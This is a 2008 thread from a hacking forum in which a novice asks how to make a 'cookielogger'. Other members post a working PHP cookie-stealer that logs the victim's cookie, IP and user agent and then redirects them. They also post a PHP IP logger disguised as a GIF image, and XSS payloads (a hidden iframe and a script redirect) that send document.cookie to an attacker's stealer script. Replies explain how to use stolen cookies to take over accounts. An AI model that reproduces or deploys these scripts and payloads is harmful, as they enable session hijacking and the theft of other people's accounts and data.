Follow us on Twitter!
One mans freedom fighter, another's terrorist.
Thursday, April 24, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 17
Guests Online: 16
Members Online: 1

Registered Members: 82889
Newest Member: Geriztul
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Page 1 of 2 1 2 >
Author

cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 00:52
how do you create a cookielogger. I have looked around for tuts and i still can't get it. Can someone explain to me on how to do it?
Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 01:26
just looks like a paste over of HBH


Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 01:43
not the article, the site.
it looks the same as HBH.


Author

RE: cookielogger

spyware
Member



Posts: 4192
Location:
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 29-04-08 02:04
moshbat wrote:
Look at what it focuses on.


Don't you mean: look what it doesn't have.

Anyway, the site is kind of a joke. The tags in your article get filtered out.



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
[center]�Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?� - Ebert[/ce
Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 02:30
heres what mine looks like

Code
<?php

  $date = date('d/m/y H:i:s' ); //gets date

  $user['agent'] = $_SERVER['HTTP_USER_AGENT']; // get user agent
  $user['ip'] = $_SERVER['REMOTE_ADDR'] ? $_SERVER['REMOTE_ADDR'] :  $_SERVER['HTTP_X_FORWARDED_FOR']; //get ip address (will see through most proxies)
  $user['referer'] = $_SERVER['HTTP_REFERER']; //get referer
  $user['cookie'] = $HTTP_GET_VARS['cookie']; //get cookie

  $text = '<br />' . '------------------------------------------------------------------------------------------------------------' . '<br />' . "<font size='+1'>" . $date . '</font>' . '<br />' . '<b>User Agent: </b>' . $user['agent'] . '<br />' . '<b>IP Address: </b>' . $user['ip'] . '<br />' . '<b>Referer: </b>' . $user['referer'] . '<br />' . '<b>Cookies: </b>' . $user['cookie'];
  $file = fopen( 'cookies.htm', 'a' ) or die(" " ); //opens the file, cookies.htm
  fwrite( $file, $text ); //writes the variables file and text to cookies.htm
  fclose( $file ); //closes file
header('location:http://www.google.com' ) //will put victim to whatever page you want (change google.com)
?>



the code is a little messy but it works really well
Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 03:55
moshbat wrote:
Would that work getting the cookie if the user has just come from another site?


Yeah as long as you add the .php?cookie=" then +document.cookie; at the end. What that does is it takes the current document.cookie, and forwards it to your PHP as the $cookie variable.


Code

<?php
putenv("TZ=GMT+1");
function clean ($var)
{
return htmlspecialchars($var);
}
$ip = clean($_SERVER['REMOTE_ADDR']);
$ref = clean($_SERVER['HTTP_REFERER']);
$time = time();
$readable_time = date("Y\-m\-d\, H\:i");
$entry = "|<u>$time ($readable_time)</u>| <b>IP:</b> $ip, <b>Ref:</b> $ref<br /> \r\n";

$fp = fopen('iplog.html', "a") or die('Cannot open logfile');
fwrite($fp, $entry);
fclose($fp);

$file = "imagesource.gif";
$fp = fopen($file, "r") or die('Cannot grab image source');
$content = fread($fp, filesize($file));
header("Content-type: image/gif");
echo $content;
fclose($fp);
?>





Like this little snippet of code, you just throw in imagesource.gif, a .htaccess with:


Code

AddHandler application/x-httpd-php .gif





And name the PHP file to whatever.gif and voila, you can link forums with that image and log information. Extremely skiddish but kinda fun/useful at times.



Edit: THis whole post is a mess sry LOL I was trying to say 2 things at once, the image one CAN'T GET COOKIES, you need to be redirected from site A to cookie stealer to get cookies. Sorry if I confused anyone :p




Edited by on 29-04-08 04:01
Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 03:58
So you don't get there passwords or anything?
Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 03:59
silent_assassin wrote:
So you don't get there passwords or anything?



You take the cookie and inject it into your own and it logs you into the account. From there you can find out passwords, change them change anything etc.


Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 04:04
Btw my post wasn't even a cookie logger, though it could VERY easily be made one it was another method for getting some other forms of information. Actually I have no fucking clue why I posted it. A big:

laptoplogic.com/data/news/images/2899/1.jpg

To me Frown


Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 04:06
Eh shit happens..

So i did it to myself on another computer. Now how do i inject it..
Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 04:15
Another way to use the stealer is to use iframes
so something like this

Code

<iframe src='http://www.site.com/stealer.php?=' +document.cookie height='0' width='0'></iframe>




This way the victim would not see anything weird happen and would not get redirected or anything.

to inject it you would need to find a vulnerability in a site
so for example, if a site was:
www.site.com/?action=bluh
you would change bluh to the code i just wrote.
if the site is vulnerable then the code will run and you would just need some one to click on
www.site.com/?action=<iframe src='site.com/stealer.php?=' + document.cookie height='0' width='0'></iframe>

Another way is to to directly put the code on a site that uses $_POST or $_GET.
So if a forum was vulnerable you would just put the code in the message part and submit it. However, many sites will filter tags so it can be annoying to find an exploit.

Edited by on 29-04-08 04:29
Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 04:18
silent_assassin wrote:
Eh shit happens..

So i did it to myself on another computer. Now how do i inject it..



By injecting javascript using HTML (script tags) into a page (gotta find an input that doesn't filter HTML out), and then use javascript to redirect the person on the page to your cookie stealer. Basically, use any form field where you can input data (sometimes in the URL bar) to this:

<script>document.location="http://www.site.com/stealer.php?cookie=" + document.cookie;</script> You gotta get that to actually work, not just pass through as text but get the javascript to work on the target site.




Edited by on 29-04-08 04:21
Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 04:34
ok i got this from cookielogging


<br /><font size='+1'>28/04/08 23:34:23</font><br /><b>User Agent: </b>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14<br /><b>IP Address: </b>66.41.188.12<br /><b>Referer: </b>http://z11.invisionfree.com/yesyesyes/index.php?showuser=1<br /><b>Cookies: </b

Can someone explain to me again what i should do...


sorry about all of this.
Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 04:36
silent_assassin wrote:
ok i got this from cookielogging


<br /><font size='+1'>28/04/08 23:34:23</font><br /><b>User Agent: </b>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14<br /><b>IP Address: </b>66.41.188.12<br /><b>Referer: </b>http://z11.invisionfree.com/yesyesyes/index.php?showuser=1<br /><b>Cookies: </b

Can someone explain to me again what i should do...


sorry about all of this.



You got everything except for a cookie lol so you can't do anything Pfft


Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 04:47
Good lord.....what am i doing wrong...
Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 04:59
So then how do i get the stupid cookie..
Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 06:00
i am using t35.com

http://xboxsomthing1.t35.com/cookielogger.php?cookie=

so it would be that????

Edited by on 29-04-08 06:00
Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 06:29
Read this:

http://www.milw0rm.com/papers/192

Everything you need to know about cookie logging and how to do it is in there.

=]

*edit* Or you could just use whiteacid's community cookie logger which is a great tool..but i prefer to use my own.

http://ccl.whiteacid.org/reg.php

Grin




Edited by on 29-04-08 06:32
Author

RE: cookielogger

Uber0n
Member



Posts: 1963
Location: Sweden‭‮
Joined: 13.06.06
Rank:
Hacker Level 3
Posted on 29-04-08 06:47
http://ccl.whitea. . .


img230.imageshack.us/img230/724/uber0nsig3hj6.gif
http://uber0n.web. . .
Nope http://uber0n.webs.com/
Author

RE: cookielogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 29-04-08 23:28
My f***ing god, i am not getting anything...
Page 1 of 2 1 2 >